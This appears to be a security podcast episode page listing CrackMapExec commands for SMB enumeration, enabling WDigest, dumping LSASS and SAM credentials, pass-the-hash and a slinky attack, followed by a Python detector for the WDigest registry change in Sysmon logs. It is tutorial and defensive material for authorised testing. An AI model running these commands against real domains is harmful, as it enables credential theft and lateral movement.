7MS #562: Cracking and Mapping and Execing with CrackMapExec

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

Hey friends, today we covered many things cracking and mapping and execing with CrackMapExec. Specifically:

# General enumeration to see if your account works, and where:
cme smb x.x.x.x -u username -p pass

# Check if print services are enabled:
cme smb x.x.x.x -u username -p pass -M spooler

# Check for the nopac vuln:
cme smb x.x.x.x -u username -p pass -M nopac

# Find Group Policy Preferences (GPP) passwords:
cme smb DOMAIN.CONTROLLER.IP.ADDRESS -u username -p pass -M gpp_password

# Get list of targets that do not require SMB signing:
cme smb x.x.x.x -u username -p pass --gen-relay-list smbsigning.txt

# Set wdigest flag:
cme smb x.x.x.x -u username -p pass -M wdigest -o ACTION=enable

# Dump creds/hashes:
cme smb x.x.x.x -u username -p pass -M lsassy

# Do pass-the-hash attacks:
cme smb x.x.x.x -u username -H HASH

# Dump SAM database:
cme smb x.x.x.x -u username -p pass --sam

# Enumerate SMB shares:
cme smb x.x.x.x -u username -p pass --shares

# Conduct slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7

# Cleanup from slinky attack:
cme smb x.x.x.x -u username -p pass -M slinky -o NAME=LOL SERVER=10.0.7.7 CLEANUP=TRUE
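
On the defending side of the wdigest step above: enabling WDigest means setting the `UseLogonCredential` registry value to 1, which Sysmon logs as Event ID 13 (registry value set) when that key is monitored. The following is an added example, not code from the episode or from CrackMapExec; the function name is hypothetical and the events are constructed samples shaped like parsed Sysmon records.

```python
import re

# Registry value that turns WDigest cleartext credential caching on (1) or off (0).
# Match CurrentControlSet as well as numbered control sets, case-insensitively.
WDIGEST_VALUE = re.compile(
    r"\\system\\(currentcontrolset|controlset\d{3})\\control"
    r"\\securityproviders\\wdigest\\uselogoncredential$",
    re.IGNORECASE,
)
# Sysmon renders DWORD data in the Details field as "DWORD (0x00000001)".
DWORD = re.compile(r"DWORD \((0x[0-9a-fA-F]+)\)")


def wdigest_enabled_events(events):
    """Return (time, host, image) for each Event ID 13 that sets UseLogonCredential to 1."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        if not WDIGEST_VALUE.search(ev.get("TargetObject", "")):
            continue
        m = DWORD.search(ev.get("Details", ""))
        if m and int(m.group(1), 16) == 1:
            hits.append((ev["UtcTime"], ev["Computer"], ev["Image"]))
    return hits


# Constructed sample events (hosts, times and images are made up for illustration).
WDIGEST_KEY = r"HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential"
SAMPLE_EVENTS = [
    {"EventID": 13, "UtcTime": "2023-03-01 10:15:02.113", "Computer": "ws01.example.test",
     "Image": r"C:\Windows\system32\svchost.exe",
     "TargetObject": WDIGEST_KEY, "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "UtcTime": "2023-03-01 10:40:55.004", "Computer": "ws01.example.test",
     "Image": r"C:\Windows\system32\svchost.exe",
     "TargetObject": WDIGEST_KEY, "Details": "DWORD (0x00000000)"},  # flag switched back off
    {"EventID": 13, "UtcTime": "2023-03-01 11:02:10.870", "Computer": "ws02.example.test",
     "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Lsa\LimitBlankPasswordUse",
     "Details": "DWORD (0x00000001)"},  # unrelated registry value
    {"EventID": 1, "UtcTime": "2023-03-01 11:05:00.000", "Computer": "ws02.example.test",
     "Image": r"C:\Windows\System32\cmd.exe"},  # process creation, not a registry event
]

if __name__ == "__main__":
    for when, host, image in wdigest_enabled_events(SAMPLE_EVENTS):
        print(f"{when} {host}: WDigest enabled by {image}")
```
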